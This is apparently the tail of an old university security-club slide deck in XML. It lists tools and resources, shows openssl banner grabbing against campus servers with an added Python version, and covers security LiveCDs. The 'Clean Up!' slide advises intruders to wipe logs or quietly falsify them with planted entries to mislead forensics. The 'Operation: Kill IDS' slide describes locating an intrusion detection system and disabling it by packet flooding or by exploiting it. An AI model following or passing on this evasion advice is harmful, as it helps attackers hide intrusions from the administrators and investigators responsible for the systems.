		</body>
	</slide><!--}}}-->

	<slide> <title>Tools You Should Have</title><!--{{{-->
		<body>

			Here is a good list of tools that you might want to keep around on a
			CD for next week:

			<DIV style="width: 50%; position:absolute">
				<ol>
					<li>Ethereal for Windows and Unix</li>
					<li>NMap for Windows and Unix</li>
				</ol>
			</DIV>

			<DIV style="width:50%; position:absolute; right: 0px">
				<ol>
					<li>enum</li>
					<li>DumpSec</li>
					<li>Windows 2000 Support Tools / Resource Kit</li>
					<li>Windows 2003 Support Tools / Resource Kit</li>
				</ol>
			</DIV>
		</body>
	</slide><!--}}}-->

	<slide> <title> Clean Up! </title><!--{{{-->
		<body>
			Clean up your tracks! Audit logs are a bitch. If you get root, or
			otherwise gain access to the logs, do as much meaningful damage to
			them as you can. You have three options with logs:
			<ul>
				<li> wipe them </li>
				<li> scramble them or otherwise taint them </li>
				<li> leave them alone </li>
			</ul>

			I'd recommend the first or second. Wiping is definitely the easiest,
			but tainting is sneakier: the unsuspecting sysadmin or forensics nerd
			expects logs to be either gone or untouched, not subtly wrong. Feel
			free to insert your own clever log entries to confuse whoever has the
			pleasure of tracing your tracks. Bear in mind that a conspicuous gap
			(or a zeroed utmp) is itself an indicator, and anything already
			forwarded to a remote syslog host or an IDS is out of your reach.
		</body>
	</slide><!--}}}-->

	<slide> <title> Tricks </title><!--{{{-->
		<body>

		</body>
	</slide><!--}}}-->

	<slide> <title> Operation: Kill IDS </title><!--{{{-->
		<body>
			An Intrusion Detection System is your worst enemy when you're being
			naughty. Perhaps "worst" is too strong of a word, but who cares! An IDS
			will log your scanning, DNS queries, etc., assuming it's configured
			properly. Snort, by default, will log most suspicious activities (zone
			transfers, etc.).

			<p/>
			What can we do? Luckily, there are ways to detect passive sniffers (IDS)
			on the network. Programs such as anti_sniff and sentinel let you
			probe for promiscuous (sniffing) nodes. There are whitepapers online about
			various methods for detecting machines that are sniffing traffic; most
			involve tricking buggy drivers into answering frames they should ignore
			while the interface is in promiscuous mode.

			<p/>
			<ul>
			<li> <a href="http://www.wiretapped.net/indexes/network-monitoring.html">Wiretapped Security Software</a></li>
			<li><a href="http://www.csh.rit.edu/~jubei/boxfinder/index.txt">boxfinder</a></li>
			</ul>

			<p/>
			Once you've discovered a sniffing device (Hopefully an IDS), you can
			try disabling it one of a few ways:
			<ul>
				<li> bombard it with millions of tiny packets, so the kernel is
				forced to drop packets to keep up with the network </li>
				<li> exploit a bug in the IDS (if you can) </li>
				<li> Others? </li>
			</ul>
		</body>
	</slide><!--}}}-->

	<slide> <title> OpenSSL </title><!--{{{-->
		<body>
			So IIS is running with SSL only (https, port 443). How do you figure
			out what version it's running? OpenSSL comes with a wonderful utility
			called... <i>openssl</i>. Any modern unix will be using openssl, so
			this tool should be available.

			<p/>

			For example, let's talk to RIT's secure IMAP server (port 993):
			<code><![CDATA[
% openssl s_client -quiet -connect mymail.rit.edu:993
depth=1 /C=GB/O=Comodo Limited/OU=Comodo Trust Network/OU=Terms and
Conditions of use: http://www.comodo.net/repository/OU=(c)2002 Comodo
Limited/CN=Comodo Class 3 Security Services CA
verify error:num=20:unable to get local issuer certificate
verify return:0
* OK Microsoft Exchange Server 2003 IMAP4rev1 server version 6.5.7226.0
(svits20.main.ad.rit.edu) ready.
]]></code>
			
			So mymail.rit.edu also happens to be svits20.main.ad.rit.edu. Running
			Exchange Server 2003, version whatever. 

			<p/>

			Even though the connection is encrypted, the server still hands its
			banner to anyone who completes the TLS handshake. The same is true for
			secure http (https, port 443):

			<code><![CDATA[% echo "HEAD / HTTP/1.0\n" | openssl s_client -quiet -connect www.rit.edu:443
HTTP/1.1 200 OK
Date: Wed, 21 Sep 2005 21:14:48 GMT
Server: Apache/1.3.9 Apache-SSL/1.36 (Unix) mod_perl/1.21 PHP/3.0.12
Connection: close
Content-Type: text/html
]]></code>

			You get the idea. So any tool that lets me generate queries that will
			break, say, Apache 1.3.9 will still work, because I can use openssl to
			connect to secure http and feed them through it. Yay Unix.
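
			<p/>

			The same check, automated in Python so you can audit your own TLS-fronted
			services for version disclosure. This is an added example, not code from
			the original slides: <i>tls_banner</i> does what <i>openssl s_client -quiet</i>
			does, and the two parsers pull the version strings out of the responses. The
			sample inputs are constructed from the slide's transcript; the hostnames and
			ports are the slide's own.

```python
import re
import socket
import ssl
# Constructed sample input: the IMAP greeting and HTTP HEAD response quoted
# in the slide, re-typed with CRLF line endings.
SAMPLE_IMAP_GREETING = (
    "* OK Microsoft Exchange Server 2003 IMAP4rev1 server version 6.5.7226.0 "
    "(svits20.main.ad.rit.edu) ready.\r\n"
)
SAMPLE_HTTP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Wed, 21 Sep 2005 21:14:48 GMT\r\n"
    "Server: Apache/1.3.9 Apache-SSL/1.36 (Unix) mod_perl/1.21 PHP/3.0.12\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html\r\n\r\n"
)

def imap_banner_info(greeting):
    """(product, version, internal hostname) from an Exchange-style IMAP
    greeting, or None when the greeting does not disclose them."""
    m = re.match(r"\* OK (.+?) IMAP4rev1 server version (\S+) \(([^)]+)\)", greeting)
    return m.groups() if m else None

def http_server_header(response):
    """The Server: header value of an HTTP response, or None if absent."""
    for line in response.split("\r\n"):
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return None

def tls_banner(host, port, request=b"", timeout=5.0):
    """What `openssl s_client -quiet -connect host:port` does: finish a TLS
    handshake, optionally send a plaintext request inside it, and return the
    first response bytes as text. Verification is disabled on purpose: as on
    the slide, we want the banner even when the chain cannot be built."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            if request:
                tls.sendall(request)
            return tls.recv(4096).decode("latin-1", "replace")

if __name__ == "__main__":
    # The slide's two probes, live (needs network access to those hosts).
    print(imap_banner_info(tls_banner("mymail.rit.edu", 993)))
    print(http_server_header(
        tls_banner("www.rit.edu", 443, b"HEAD / HTTP/1.0\r\n\r\n")))
```

			Run against your own hosts, a non-None result means the service is
			announcing product and version through the encrypted channel.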

		</body>
	</slide><!--}}}-->

	<slide> <title> LiveCDs for Justice </title><!--{{{-->
		<body>
			LiveCDs are happy little tools that you can stick into a machine and
			boot a utility-oriented OS install, probably Linux plus some tools. There
			are a number of security-related LiveCDs available to you. A HUGE list
			of known LiveCD kits is available here:<br/>
			<a
			href="http://www.frozentech.com/content/livecd.php">http://www.frozentech.com/content/livecd.php</a>
			<br/>
			You can search for security-related LiveCDs on that site.

			<p/>

			<a href="http://www.knoppix-std.org/tools.html">Knoppix STD</a> seems
			to have a fair set of useful tools, you might start with that.

		</body>
	</slide><!--}}}-->
		
	<slide> <title> Resources </title>
		<body>
			Security Alert Resources:
			<ul>
			<li> <a href="http://www.cert.org">CERT</a> - Computer
			Emergency Response Team. A very popular place to find new vulnerability
			information.</li>
			<li> <a href="http://www.securityfocus.com">SecurityFocus</a> -
			 another hugely popular website for vulnerability disclosure and
			 reports</li>
			<li> <a href="http://www.secunia.com">Secunia</a> -
			well-presented website with up-to-date information on vulnerabilities
			on lots of software. Easy to search, categorized by types and
			applications. </li>
			<li> <a href="http://www.zone-h.org">zone-h</a> - a more
			"hacker"-oriented security vulnerability site </li>
			</ul>

			Unix tools:
			<ul>
				<li> netcat (if you don't have it) </li>
				<li> <a href="http://insecure.org/nmap">nmap</a> - network mapping
				tool </li>
				<li> <a
				href="http://www.laurentconstantin.com/en/netw/netwox/">netwox</a> -
				network testing utility toolkit </li>
				<li> <a href="http://ettercap.sf.net">ettercap</a> - MITM/sniffing
				tool </li>
				<li> <a href="http://www.ethereal.com">ethereal</a> - tcpdump for
				kids who aren't cool enough for tcpdump. </li>
				<li> <a
				href="http://www.securityfocus.com/tools/176">fragrouter?</a> - tool
				for testing firewall stupidity (with fragmented packets) </li>
				<li> <a href="http://xprobe.sourceforge.net">xprobe2</a> - extremely
				fast remote OS fingerprinting tool</li>
				<li> <a href="http://www.monkey.org/~dugsong/dsniff/">dsniff</a> -
				collection of tools for network auditing and penetration testing </li>
			</ul>

			<ul>
			<li> <a href="http://www.securityforest.com/">Security Forest</a> - Home of the Exploit Tree </li>

			</ul>

			Rootkit Info:
			<ul>
				<li><a href="http://en.wikipedia.org/wiki/Root_kit">wikipedia's
				article on root kits</a> </li>
				<li><a href="http://www.rootkit.com/">http://www.rootkit.com/</a></li>
				<li><a href="http://www.egocrew.de/download.html">http://www.egocrew.de/download.html</a></li>
			</ul>
			
			Promiscuous Node Detection:
			<ul>
			<li> <a href="http://www.wiretapped.net/indexes/network-monitoring.html">Wiretapped Security Software</a></li>
			<li><a href="http://www.csh.rit.edu/~jubei/boxfinder/index.txt">boxfinder</a></li>
			</ul>

			Security LiveCDs:
			<ul>
			<li><a href="http://www.frozentech.com/content/livecd.php">http://www.frozentech.com/content/livecd.php</a></li>
			<li><a href="http://www.knoppix-std.org/tools.html">Knoppix STD</a></li>
			</ul>

		</body>
	</slide>
</slideshow>
